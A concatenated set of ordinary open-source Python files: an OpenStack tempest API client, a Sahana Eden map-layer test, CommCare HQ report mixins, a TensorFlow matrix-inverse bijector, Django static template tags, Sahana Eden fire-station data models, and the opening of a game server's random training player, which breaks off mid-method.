# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils as json
from six.moves.urllib import parse as urllib
from tempest.api_schema.response.compute.v2_1 import floating_ips as schema
from tempest.common import service_client
class FloatingIPPoolsClient(service_client.ServiceClient):
def list_floating_ip_pools(self, params=None):
"""Gets all floating IP Pools list."""
url = 'os-floating-ip-pools'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
self.validate_response(schema.list_floating_ip_pools, resp, body)
return service_client.ResponseBody(resp, body)
| apache-2.0 |
tudorian/eden | tests/unit_tests/modules/s3/s3gis/YahooLayer.py | 43 | 1342 |
s3gis_tests = load_module("tests.unit_tests.modules.s3.s3gis")
test_utils = local_import("test_utils")
yahoo_layer = dict(
name = "Test Yahoo Layer",
description = "Test Yahoo",
enabled = True,
created_on = datetime.datetime.now(),
modified_on = datetime.datetime.now(),
satellite_enabled = True,
maps_enabled = True,
hybrid_enabled = True,
apikey = "FAKEAPIKEY",
)
def test_YahooLayer():
s3gis_tests.layer_test(
db,
db.gis_layer_yahoo,
yahoo_layer,
"S3.gis.Yahoo",
{
"Hybrid": u"Yahoo Hybrid",
"Maps": u"Yahoo Maps",
"Satellite": u"Yahoo Satellite",
},
session = session,
request = request,
)
def test_yahoo_scripts():
with s3gis_tests.InsertedRecord(db, db.gis_layer_yahoo, yahoo_layer):
with s3gis_tests.AddedRole(session, session.s3.system_roles.MAP_ADMIN):
actual_output = str(
s3base.GIS().show_map(
catalogue_layers = True,
projection = 900913,
)
)
s3gis_tests.check_scripts(
actual_output,
[
"http://api.maps.yahoo.com/ajaxymap?v=3.8&appid=FAKEAPIKEY"
],
request
)
| mit |
qedsoftware/commcare-hq | corehq/apps/reports/standard/__init__.py | 1 | 8604 |
from datetime import datetime
import dateutil
from django.core.cache import cache
from django.core.urlresolvers import reverse
from corehq.apps.casegroups.models import CommCareCaseGroup
from corehq.apps.groups.models import Group
from corehq.apps.reports import util
from corehq.apps.reports.dispatcher import ProjectReportDispatcher, CustomProjectReportDispatcher
from corehq.apps.reports.exceptions import BadRequestError
from corehq.apps.reports.filters.users import UserTypeFilter
from corehq.apps.reports.generic import GenericReportView
from corehq.apps.reports.filters.select import MonthFilter, YearFilter
from corehq.apps.users.models import CommCareUser
from dimagi.utils.dates import DateSpan
from django.utils.translation import ugettext_noop
from dimagi.utils.decorators.memoized import memoized
class ProjectReport(GenericReportView):
# overriding properties from GenericReportView
section_name = ugettext_noop("Project Reports")
base_template = 'reports/base_template.html'
dispatcher = ProjectReportDispatcher
asynchronous = True
@property
def default_report_url(self):
return reverse('reports_home', args=[self.request.project])
class CustomProjectReport(ProjectReport):
dispatcher = CustomProjectReportDispatcher
emailable = True
class CommCareUserMemoizer(object):
@memoized
def by_domain(self, domain, is_active=True):
users = CommCareUser.by_domain(domain, is_active=is_active)
for user in users:
# put users in the cache for get_by_user_id
# so that function never has to touch the database
self.get_by_user_id.get_cache(self)[(self, user.user_id)] = user
return users
@memoized
def get_by_user_id(self, user_id):
return CommCareUser.get_by_user_id(user_id)
class ProjectReportParametersMixin(object):
"""
All the parameters necessary for the project reports.
Intended to be mixed in with a GenericReportView object.
"""
default_case_type = None
filter_group_name = None
filter_users_field_class = UserTypeFilter
include_inactive = False
# set this to set the report's user ids from within the report
# (i.e. based on a filter's return value).
override_user_ids = None
@property
@memoized
def CommCareUser(self):
return CommCareUserMemoizer()
@memoized
def get_all_users_by_domain(self, group=None, user_ids=None, user_filter=None, simplified=False):
return list(util.get_all_users_by_domain(
domain=self.domain,
group=group,
user_ids=user_ids,
user_filter=user_filter,
simplified=simplified,
CommCareUser=self.CommCareUser
))
@property
@memoized
def user_filter(self):
return self.filter_users_field_class.get_user_filter(self.request)[0]
@property
@memoized
def default_user_filter(self):
return self.filter_users_field_class.get_user_filter(None)[0]
@property
def group_id(self):
return self.request.GET.get('group', '')
@property
@memoized
def group(self):
return Group.get(self.group_id) if self.group_id else None
@property
def individual(self):
"""
todo: remember this: if self.individual and self.users:
self.name = "%s for %s" % (self.name, self.users[0].raw_username)
"""
return self.request_params.get('individual', '')
@property
def mobile_worker_ids(self):
ids = self.request.GET.getlist('select_mw')
if '_all' in ids or self.request.GET.get('all_mws', 'off') == 'on':
cache_str = "mw_ids:%s" % self.domain
ids = cache.get(cache_str)
if not ids:
cc_users = CommCareUser.by_domain(self.domain)
if self.include_inactive:
cc_users += CommCareUser.by_domain(self.domain, is_active=False)
ids = [ccu._id for ccu in cc_users]
cache.set(cache_str, ids, 24*60*60)
return ids
@property
@memoized
def users(self):
if self.filter_group_name and not (self.group_id or self.individual):
group = Group.by_name(self.domain, self.filter_group_name)
else:
group = self.group
if self.override_user_ids is not None:
user_ids = self.override_user_ids
else:
user_ids = [self.individual]
return self.get_all_users_by_domain(
group=group,
user_ids=tuple(user_ids),
user_filter=tuple(self.user_filter),
simplified=True
)
@property
@memoized
def user_ids(self):
return [user.user_id for user in self.users]
@property
@memoized
def usernames(self):
return {user.user_id: user.username_in_report for user in self.users}
@property
def history(self):
history = self.request_params.get('history', '')
if history:
try:
return dateutil.parser.parse(history)
except ValueError:
pass
@property
def case_type(self):
return self.default_case_type or self.request_params.get('case_type', '')
@property
def case_status(self):
from corehq.apps.reports.filters.select import SelectOpenCloseFilter
return self.request_params.get(SelectOpenCloseFilter.slug, '')
@property
def case_group_ids(self):
return filter(None, self.request.GET.getlist('case_group'))
@property
@memoized
def case_groups(self):
return [CommCareCaseGroup.get(g) for g in self.case_group_ids]
@property
@memoized
def cases_by_case_group(self):
case_ids = []
for group in self.case_groups:
case_ids.extend(group.cases)
return case_ids
class CouchCachedReportMixin(object):
"""
Use this mixin for caching reports as objects in couch.
"""
_cached_report = None
@property
def cached_report(self):
if not self._cached_report:
self._cached_report = self.fetch_cached_report()
return self._cached_report
def fetch_cached_report(self):
"""
Here's where you generate your cached report.
"""
raise NotImplementedError
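# Illustrative subclass sketch (not part of the original module); the document
# class is hypothetical:
#   class MyCachedReport(CouchCachedReportMixin, ProjectReport):
#       def fetch_cached_report(self):
#           return MyReportDocument.get(self.domain)   # hypothetical couch doc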
class DatespanMixin(object):
"""
Use this where you'd like to include the datespan field.
"""
datespan_field = 'corehq.apps.reports.filters.dates.DatespanFilter'
datespan_default_days = 7
datespan_max_days = None
inclusive = True
_datespan = None
@property
def datespan(self):
if self._datespan is None:
datespan = self.default_datespan
if self.request.datespan.is_valid() and not self.request.datespan.is_default:
datespan.enddate = self.request.datespan.enddate
datespan.startdate = self.request.datespan.startdate
datespan.is_default = False
elif self.request.datespan.get_validation_reason() == "You can't use dates earlier than the year 1900":
raise BadRequestError()
self.request.datespan = datespan
# todo: don't update self.context here. find a better place! AGH! Sorry, sorry.
self.context.update(dict(datespan=datespan))
self._datespan = datespan
return self._datespan
@property
def default_datespan(self):
datespan = DateSpan.since(self.datespan_default_days, timezone=self.timezone, inclusive=self.inclusive)
datespan.max_days = self.datespan_max_days
datespan.is_default = True
return datespan
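# Illustrative sketch (not part of the original module): a report opting into
# the datespan filter, assuming fields takes dotted filter paths:
#   class MyDatedReport(DatespanMixin, ProjectReport):
#       fields = [DatespanMixin.datespan_field]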
class MonthYearMixin(object):
"""
Similar to DatespanMixin, but works with MonthField and YearField
"""
fields = [MonthFilter, YearFilter]
_datespan = None
@property
def datespan(self):
if self._datespan is None:
datespan = DateSpan.from_month(self.month, self.year)
self.request.datespan = datespan
self.context.update(dict(datespan=datespan))
self._datespan = datespan
return self._datespan
@property
def month(self):
if 'month' in self.request_params:
return int(self.request_params['month'])
else:
return datetime.utcnow().month
@property
def year(self):
if 'year' in self.request_params:
return int(self.request_params['year'])
else:
return datetime.utcnow().year
| bsd-3-clause |
yanchen036/tensorflow | tensorflow/contrib/distributions/python/ops/bijectors/matrix_inverse_tril.py | 3 | 5272 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""MatrixInverseTriL bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import bijector
__all__ = [
"MatrixInverseTriL",
]
class MatrixInverseTriL(bijector.Bijector):
"""Computes `g(L) = inv(L)`, where `L` is a lower-triangular matrix.
`L` must be nonsingular; equivalently, all diagonal entries of `L` must be
nonzero.
The input must have `rank >= 2`. The input is treated as a batch of matrices
with batch shape `input.shape[:-2]`, where each matrix has dimensions
`input.shape[-2]` by `input.shape[-1]` (hence `input.shape[-2]` must equal
`input.shape[-1]`).
#### Examples
```python
tfd.bijectors.MatrixInverseTriL().forward(x=[[1., 0], [2, 1]])
# Result: [[1., 0], [-2, 1]], i.e., inv(x)
tfd.bijectors.MatrixInverseTriL().inverse(y=[[1., 0], [-2, 1]])
# Result: [[1., 0], [2, 1]], i.e., inv(y).
```
"""
def __init__(self, validate_args=False, name="matrix_inverse_tril"):
"""Instantiates the `MatrixInverseTriL` bijector.
Args:
validate_args: Python `bool` indicating whether arguments should be
checked for correctness.
name: Python `str` name given to ops managed by this object.
"""
self._graph_parents = []
self._name = name
super(MatrixInverseTriL, self).__init__(
forward_min_event_ndims=2,
validate_args=validate_args,
name=name)
def _forward(self, x):
with ops.control_dependencies(self._assertions(x)):
shape = array_ops.shape(x)
return linalg_ops.matrix_triangular_solve(
x, linalg_ops.eye(shape[-1], batch_shape=shape[:-2]), lower=True)
def _inverse(self, y):
return self._forward(y)
def _forward_log_det_jacobian(self, x):
# Calculation of the Jacobian:
#
# Let X = (x_{ij}), 0 <= i,j < n, be a matrix of indeterminates. Let Z =
# X^{-1} where Z = (z_{ij}). Then
#
# dZ/dx_{ij} = (d/dt | t=0) Y(t)^{-1},
#
# where Y(t) = X + t*E_{ij} and E_{ij} is the matrix with a 1 in the (i,j)
# entry and zeros elsewhere. By the product rule,
#
# 0 = d/dt [Identity matrix]
# = d/dt [Y Y^{-1}]
# = Y d/dt[Y^{-1}] + dY/dt Y^{-1}
#
# so
#
# d/dt[Y^{-1}] = -Y^{-1} dY/dt Y^{-1}
# = -Y^{-1} E_{ij} Y^{-1}.
#
# Evaluating at t=0,
#
# dZ/dx_{ij} = -Z E_{ij} Z.
#
# Taking the (r,s) entry of each side,
#
# dz_{rs}/dx_{ij} = -z_{ri}z_{sj}.
#
# Now, let J be the Jacobian dZ/dX, arranged as the n^2-by-n^2 matrix whose
# (r*n + s, i*n + j) entry is dz_{rs}/dx_{ij}. Considering J as an n-by-n
# block matrix with n-by-n blocks, the above expression for dz_{rs}/dx_{ij}
# shows that the block at position (r,i) is -z_{ri}Z. Hence
#
# J = -KroneckerProduct(Z, Z),
# det(J) = (-1)^(n^2) (det Z)^(2n)
# = (-1)^n (det X)^(-2n).
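#
# Hence |det(J)| = |det(X)|^(-2n), and since X is lower triangular,
# det(X) = prod_i x_{ii}, so
#
#   log|det(J)| = -2n * sum_i log|x_{ii}|,
#
# which is what the expression below computes.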
with ops.control_dependencies(self._assertions(x)):
return (-2. * math_ops.cast(array_ops.shape(x)[-1], x.dtype.base_dtype) *
math_ops.reduce_sum(
math_ops.log(math_ops.abs(array_ops.matrix_diag_part(x))),
axis=-1))
def _assertions(self, x):
if not self.validate_args:
return []
shape = array_ops.shape(x)
is_matrix = check_ops.assert_rank_at_least(
x, 2, message="Input must have rank at least 2.")
is_square = check_ops.assert_equal(
shape[-2], shape[-1], message="Input must be a square matrix.")
above_diagonal = array_ops.matrix_band_part(
array_ops.matrix_set_diag(
x, array_ops.zeros(shape[:-1], dtype=dtypes.float32)),
0, -1)
is_lower_triangular = check_ops.assert_equal(
above_diagonal, array_ops.zeros_like(above_diagonal),
message="Input must be lower triangular.")
# A lower triangular matrix is nonsingular iff all its diagonal entries are
# nonzero.
diag_part = array_ops.matrix_diag_part(x)
is_nonsingular = check_ops.assert_none_equal(
diag_part, array_ops.zeros_like(diag_part),
message="Input must have all diagonal entries nonzero.")
return [is_matrix, is_square, is_lower_triangular, is_nonsingular]
| apache-2.0 |
webgeodatavore/django | django/templatetags/static.py | 197 | 4052 |
from django import template
from django.utils.encoding import iri_to_uri
from django.utils.six.moves.urllib.parse import urljoin
register = template.Library()
class PrefixNode(template.Node):
def __repr__(self):
return "<PrefixNode for %r>" % self.name
def __init__(self, varname=None, name=None):
if name is None:
raise template.TemplateSyntaxError(
"Prefix nodes must be given a name to return.")
self.varname = varname
self.name = name
@classmethod
def handle_token(cls, parser, token, name):
"""
Class method to parse prefix node and return a Node.
"""
# token.split_contents() isn't useful here because tags using this method don't accept variables as arguments
tokens = token.contents.split()
if len(tokens) > 1 and tokens[1] != 'as':
raise template.TemplateSyntaxError(
"First argument in '%s' must be 'as'" % tokens[0])
if len(tokens) > 1:
varname = tokens[2]
else:
varname = None
return cls(varname, name)
@classmethod
def handle_simple(cls, name):
try:
from django.conf import settings
except ImportError:
prefix = ''
else:
prefix = iri_to_uri(getattr(settings, name, ''))
return prefix
def render(self, context):
prefix = self.handle_simple(self.name)
if self.varname is None:
return prefix
context[self.varname] = prefix
return ''
@register.tag
def get_static_prefix(parser, token):
"""
Populates a template variable with the static prefix,
``settings.STATIC_URL``.
Usage::
{% get_static_prefix [as varname] %}
Examples::
{% get_static_prefix %}
{% get_static_prefix as static_prefix %}
"""
return PrefixNode.handle_token(parser, token, "STATIC_URL")
@register.tag
def get_media_prefix(parser, token):
"""
Populates a template variable with the media prefix,
``settings.MEDIA_URL``.
Usage::
{% get_media_prefix [as varname] %}
Examples::
{% get_media_prefix %}
{% get_media_prefix as media_prefix %}
"""
return PrefixNode.handle_token(parser, token, "MEDIA_URL")
class StaticNode(template.Node):
def __init__(self, varname=None, path=None):
if path is None:
raise template.TemplateSyntaxError(
"Static template nodes must be given a path to return.")
self.path = path
self.varname = varname
def url(self, context):
path = self.path.resolve(context)
return self.handle_simple(path)
def render(self, context):
url = self.url(context)
if self.varname is None:
return url
context[self.varname] = url
return ''
@classmethod
def handle_simple(cls, path):
return urljoin(PrefixNode.handle_simple("STATIC_URL"), path)
@classmethod
def handle_token(cls, parser, token):
"""
Class method to parse prefix node and return a Node.
"""
bits = token.split_contents()
if len(bits) < 2:
raise template.TemplateSyntaxError(
"'%s' takes at least one argument (path to file)" % bits[0])
path = parser.compile_filter(bits[1])
if len(bits) >= 2 and bits[-2] == 'as':
varname = bits[3]
else:
varname = None
return cls(varname, path)
@register.tag('static')
def do_static(parser, token):
"""
Joins the given path with the STATIC_URL setting.
Usage::
{% static path [as varname] %}
Examples::
{% static "myapp/css/base.css" %}
{% static variable_with_path %}
{% static "myapp/css/base.css" as admin_base_css %}
{% static variable_with_path as varname %}
"""
return StaticNode.handle_token(parser, token)
def static(path):
return StaticNode.handle_simple(path)
| bsd-3-clause |
sammyshj/gci | modules/s3db/fire.py | 4 | 21906 |
# -*- coding: utf-8 -*-
""" Sahana Eden Fire Models
@copyright: 2009-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3FireModel",
"S3FireStationModel",
]
from gluon import *
from gluon.dal import Row
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
# =============================================================================
class S3FireModel(S3Model):
"""
Fire Zones: Burn Perimeter, Burnt zone, Evacuation Zone, etc
"""
names = ["fire_zone_type",
"fire_zone",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# -----------------------------------------------------------
# Fire Zone Types
tablename = "fire_zone_type"
table = define_table(tablename,
Field("name",
label=T("Name")),
# @ToDo: Currently unused - apply in layer_feature for now
Field("style", "text",
label=T("Style")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_ZONE_TYPE = T("Add Zone Type")
crud_strings[tablename] = Storage(
title_create = ADD_ZONE_TYPE,
title_display = T("Zone Type Details"),
title_list = T("Zone Types"),
title_update = T("Edit Zone Type"),
title_search = T("Search Zone Types"),
title_upload = T("Import Zone Types"),
subtitle_create = T("Add New Zone Type"),
label_list_button = T("List Zone Types"),
label_create_button = T("Add New Zone Type"),
label_delete_button = T("Delete Zone Type"),
msg_record_created = T("Zone Type added"),
msg_record_modified = T("Zone Type updated"),
msg_record_deleted = T("Zone Type deleted"),
msg_list_empty = T("No Zone Types currently registered"))
zone_type_represent = S3Represent(lookup=tablename)
self.configure(tablename,
deduplicate = self.fire_zone_type_duplicate,
)
# -----------------------------------------------------------
# Fire Zones
tablename = "fire_zone"
table = define_table(tablename,
Field("name",
label=T("Name")),
Field("zone_type_id", db.fire_zone_type,
requires = IS_NULL_OR(
IS_ONE_OF(db, "fire_zone_type.id",
zone_type_represent,
sort=True)),
represent = zone_type_represent,
comment = S3AddResourceLink(c="fire",
f="zone_type",
label=ADD_ZONE_TYPE,
tooltip=T("Select a Zone Type from the list or click 'Add Zone Type'")),
label=T("Type")),
self.gis_location_id(
widget = S3LocationSelectorWidget(
catalog_layers=True,
polygon=True
)
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
title_create = T("Add Zone"),
title_display = T("Zone Details"),
title_list = T("Zones"),
title_update = T("Edit Zone"),
title_search = T("Search Zones"),
title_upload = T("Import Zones"),
subtitle_create = T("Add New Zone"),
label_list_button = T("List Zones"),
label_create_button = T("Add New Zone"),
label_delete_button = T("Delete Zone"),
msg_record_created = T("Zone added"),
msg_record_modified = T("Zone updated"),
msg_record_deleted = T("Zone deleted"),
msg_list_empty = T("No Zones currently registered"))
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return Storage()
# -------------------------------------------------------------------------
@staticmethod
def fire_zone_type_duplicate(item):
"""
Zone Type record duplicate detection, used for the deduplicate hook
@param item: the S3ImportItem to check
"""
if item.tablename == "fire_zone_type":
table = item.table
query = (table.name == item.data.name)
row = current.db(query).select(table.id,
limitby=(0, 1)).first()
if row:
item.id = row.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3FireStationModel(S3Model):
"""
A Model to manage Fire Stations:
http://eden.sahanafoundation.org/wiki/Deployments/Bombeiros
"""
names = ["fire_station",
"fire_station_vehicle",
"fire_water_source",
"fire_hazard_point",
"fire_staff_on_duty"
]
def model(self):
T = current.T
db = current.db
request = current.request
person_id = self.pr_person_id
location_id = self.gis_location_id
organisation_id = self.org_organisation_id
human_resource_id = self.hrm_human_resource_id
ireport_id = self.irs_ireport_id
vehicle_id = self.vehicle_vehicle_id
add_component = self.add_component
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# =====================================================================
# Fire Station
#
fire_station_types = {
1: T("Fire Station"),
9: T("Unknown type of facility"),
}
tablename = "fire_station"
table = define_table(tablename,
self.super_link("site_id", "org_site"),
Field("name", notnull=True, length=64,
label = T("Name")),
Field("code", unique=True, length=64,
label = T("Code")),
Field("facility_type", "integer",
label = T("Facility Type"),
requires = IS_NULL_OR(IS_IN_SET(fire_station_types)),
default = 1,
represent = lambda opt: \
fire_station_types.get(opt, T("not specified"))
),
organisation_id(),
location_id(),
Field("phone", label = T("Phone"),
requires = IS_NULL_OR(s3_phone_requires)),
Field("website", label=T("Website"),
requires = IS_NULL_OR(IS_URL()),
represent = lambda url: s3_url_represent(url)),
Field("email", label = T("Email"),
requires = IS_NULL_OR(IS_EMAIL())
),
Field("fax", label = T("Fax"),
requires = IS_NULL_OR(s3_phone_requires)),
Field("obsolete", "boolean",
label = T("Obsolete"),
represent = lambda bool: \
(bool and [T("Obsolete")] or [current.messages["NONE"]])[0],
default = False,
readable = False,
writable = False),
s3_comments(),
*s3_meta_fields())
self.configure("fire_station",
super_entity="org_site")
station_id = S3ReusableField("station_id", table,
requires = IS_NULL_OR(
IS_ONE_OF(db, "fire_station.id",
self.fire_station_represent)),
represent = self.fire_station_represent,
label = T("Station"),
ondelete = "CASCADE"
)
# CRUD strings
ADD_FIRE_STATION = T("Add Fire Station")
crud_strings[tablename] = Storage(
title_create = ADD_FIRE_STATION,
title_display = T("Fire Station Details"),
title_list = T("Fire Stations"),
title_update = T("Edit Station Details"),
title_search = T("Search for Fire Station"),
title_upload = T("Upload Fire Stations List"),
title_map = T("Map of Fire Stations"),
subtitle_create = T("Add New Fire Station"),
label_list_button = T("List Fire Stations"),
label_create_button = ADD_FIRE_STATION,
label_delete_button = T("Delete Fire Station"),
msg_record_created = T("Fire Station added"),
msg_record_modified = T("Fire Station updated"),
msg_record_deleted = T("Fire Station deleted"),
msg_no_match = T("No Fire Stations could be found"),
msg_list_empty = T("No Fire Stations currently registered"))
add_component("vehicle_vehicle",
fire_station = Storage(link="fire_station_vehicle",
joinby="station_id",
key="vehicle_id",
actuate="replace"))
add_component("fire_shift",
fire_station = "station_id")
add_component("fire_shift_staff",
fire_station = "station_id")
# =====================================================================
# Vehicles of Fire stations
#
tablename = "fire_station_vehicle"
table = define_table(tablename,
station_id(),
vehicle_id(),
*s3_meta_fields()
)
# CRUD strings
ADD_VEHICLE = T("Add Vehicle")
crud_strings[tablename] = Storage(
title_create = ADD_VEHICLE,
title_display = T("Vehicle Details"),
title_list = T("Vehicles"),
title_update = T("Edit Vehicle Details"),
title_search = T("Search for Vehicles"),
title_upload = T("Upload Vehicles List"),
subtitle_create = T("Add New Vehicle"),
label_list_button = T("List Vehicles"),
label_create_button = ADD_VEHICLE,
label_delete_button = T("Delete Vehicle"),
msg_record_created = T("Vehicle added"),
msg_record_modified = T("Vehicle updated"),
msg_record_deleted = T("Vehicle deleted"),
msg_no_match = T("No Vehicles could be found"),
msg_list_empty = T("No Vehicles currently registered"))
self.set_method("fire", "station",
method="vehicle_report",
action=self.vehicle_report)
# =====================================================================
# Water Sources
#
tablename = "fire_water_source"
table = define_table(tablename,
Field("name", "string"),
location_id(),
#Field("good_for_human_usage", "boolean"),
#Field("fresh", "boolean"),
#Field("Salt", "boolean"),
#Field("toponymy", "string"),
#Field("parish", "string"),
#Field("type", "string"),
#Field("owner", "string"),
#person_id(),
#organisation_id(),
#Field("shape", "string"),
#Field("diameter", "string"),
#Field("depth", "string"),
#Field("volume", "integer"),
#Field("lenght", "integer"),
#Field("height", "integer"),
#Field("usefull_volume", "integer"),
#Field("catchment", "integer"),
#Field("area", "integer"),
#Field("date", "date"),
#Field("access_type", "string"),
#Field("previews_usage", "boolean"),
#Field("car_access", "string"),
#Field("mid_truck_access", "string"),
#Field("truck_access", "string"),
#Field("distance_from_trees", "integer"),
#Field("distance_from_buildings", "integer"),
#Field("helicopter_access", "string"),
#Field("previews_usage_air", "boolean"),
#Field("car_movment_conditions", "string"),
#Field("midtruck_movment_conditions", "string"),
#Field("truck_movment_conditions", "string"),
#Field("powerline_distance", "integer"),
#Field("distance_other_risks", "integer"),
#Field("anti_seismic_construction", "boolean"),
#Field("isolated_from_air", "boolean"),
#Field("hermetic", "boolean"),
s3_comments(),
*s3_meta_fields())
# =====================================================================
# Hazards
# - this is long-term hazards, not incidents
#
tablename = "fire_hazard_point"
table = define_table(tablename,
location_id(),
Field("name", "string"),
# What are the Org & Person for? Contacts?
organisation_id(),
person_id(),
s3_comments(),
*s3_meta_fields())
# =====================================================================
# Shifts
#
tablename = "fire_shift"
table = define_table(tablename,
station_id(),
Field("name"),
s3_datetime("start_time",
empty=False,
default="now"
),
s3_datetime("end_time",
empty=False,
default="now"
),
*s3_meta_fields())
shift_id = S3ReusableField("shift_id", table,
requires = IS_NULL_OR(
IS_ONE_OF(db, "fire_shift.id",
self.fire_shift_represent)),
represent = self.fire_shift_represent,
label = T("Shift"),
ondelete = "CASCADE")
# ---------------------------------------------------------------------
tablename = "fire_shift_staff"
table = define_table(tablename,
station_id(),
#shift_id(),
human_resource_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return Storage(
# used by IRS
fire_staff_on_duty = self.fire_staff_on_duty
)
# -------------------------------------------------------------------------
@staticmethod
def fire_station_represent(id, row=None):
""" FK representation """
if row:
return row.name
elif not id:
return current.messages["NONE"]
db = current.db
table = db.fire_station
r = db(table.id == id).select(table.name,
limitby = (0, 1)).first()
try:
return r.name
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def fire_shift_represent(id, row=None):
"""
Represent a Shift by Start and End times
"""
if row:
pass
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.fire_shift
row = db(table.id == id).select(table.start_time,
table.end_time,
limitby=(0, 1)).first()
try:
return "%s - %s" % (row.start_time, row.end_time)
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def fire_staff_on_duty(station_id=None):
"""
Return a query for hrm_human_resource filtering
for entries which are linked to a current shift
"""
db = current.db
staff = db.hrm_human_resource
roster = db.fire_shift_staff
query = (staff.id == roster.human_resource_id) & \
(roster.deleted != True)
if station_id is not None:
query &= (roster.station_id == station_id)
return query
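# Illustrative note only (assumes a configured Sahana Eden runtime): the
# query returned by fire_staff_on_duty() is meant to be combined with the
# DAL, for example
#     query = current.s3db.fire_staff_on_duty(station_id=3)
#     rows = current.db(query).select(current.db.hrm_human_resource.id)
# where station_id=3 is a hypothetical value used only for illustration.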
# -------------------------------------------------------------------------
@staticmethod
def vehicle_report(r, **attr):
"""
Custom method to provide a report on Vehicle Deployment Times
- this is one of the main tools currently used to manage an Incident
"""
rheader = attr.get("rheader", None)
if rheader:
rheader = rheader(r)
station_id = r.id
if station_id:
s3db = current.s3db
dtable = s3db.irs_ireport_vehicle
vtable = s3db.vehicle_vehicle
stable = s3db.fire_station_vehicle
query = (stable.station_id == station_id) & \
(stable.vehicle_id == vtable.id) & \
(vtable.asset_id == dtable.asset_id)
current.response.s3.crud_strings["irs_ireport_vehicle"] = Storage(
title_report = "Vehicle Deployment Times"
)
req = r.factory(prefix="irs",
name="ireport_vehicle",
args=["report"],
vars=Storage(
rows = "asset_id",
cols = "ireport_id",
fact = "minutes",
aggregate = "sum")
)
req.set_handler("report", S3Report())
req.resource.add_filter(query)
return req(rheader=rheader)
# END =========================================================================
|
mit
|
thilaire/CodingGameServer
|
games/Networks/server/AliceRandomPlayer.py
|
1
|
4279
|
"""
* --------------------- *
| |
| Coding Game Server |
| |
* --------------------- *
Authors: M. Pecheux (based on T. Hilaire and J. Brajard template file)
Licence: GPL
File: AliceRandomPlayer.py
Contains the class AliceRandomPlayer
-> defines a dummy Alice player that plays randomly every time (but does not lose)
Copyright 2017 M. Pecheux
"""
from CGSserver.Player import TrainingPlayer
from random import choice
from .Constants import CAPTURE, DESTROY, LINK_H, LINK_V, DO_NOTHING, \
LINK_ENERGY, DESTROY_ENERGY
boolConv = {'true': True, 'false': False}
def check_type(element, typecheck):
"""Function that checks for class type (class is not yet
defined, so cannot use type() built-in...)"""
return element is not None and element.__class__.__name__ == typecheck
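# Illustrative sketch only (not part of the original file): check_type matches
# on the class *name*, so any class literally named "Node" qualifies. The
# _FakeNode class and this helper are hypothetical, added for demonstration.
def _check_type_example():
    _FakeNode = type("Node", (object,), {})
    assert check_type(_FakeNode(), "Node")
    assert not check_type(None, "Node")
    assert not check_type(_FakeNode(), "Link")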
class AliceRandomPlayer(TrainingPlayer):
"""
This class implements Alice: a training player that plays... randomly.
Every player should be able to beat her.
"""
def __init__(self, **options):
"""
Initialize the training player
The option "advanced=true" (default) or "advanced=false" is possible
This option indicates if the player can also destroy/create links
"""
super().__init__('ALICE')
# check "advanced" option
if "advanced" not in options:
self.advanced = True
elif options["advanced"].lower() in boolConv:
self.advanced = boolConv[options["advanced"].lower()]
else:
raise ValueError("The option advanced=%s is incorrect." % options["advanced"])
def neighbours(self, x, y, us):
"""
:param x: x coordinate of a node cell
:param y: y coordinate of a node cell
:param us: our player number (0 or 1)
:return: list of the neighbouring nodes of (x, y) that we do not own and that are reachable through an existing link
"""
neighbours = []
if x > 1:
n = self.game.board[x-2][y]
l = self.game.board[x-1][y]
if check_type(n, "Node") and ( n.owner != us) and \
check_type(l, "Link") and l.direction == 0:
neighbours.append(n)
if x < self.game.L-2:
n = self.game.board[x+2][y]
l = self.game.board[x+1][y]
if check_type(n, "Node") and (n.owner != us) and \
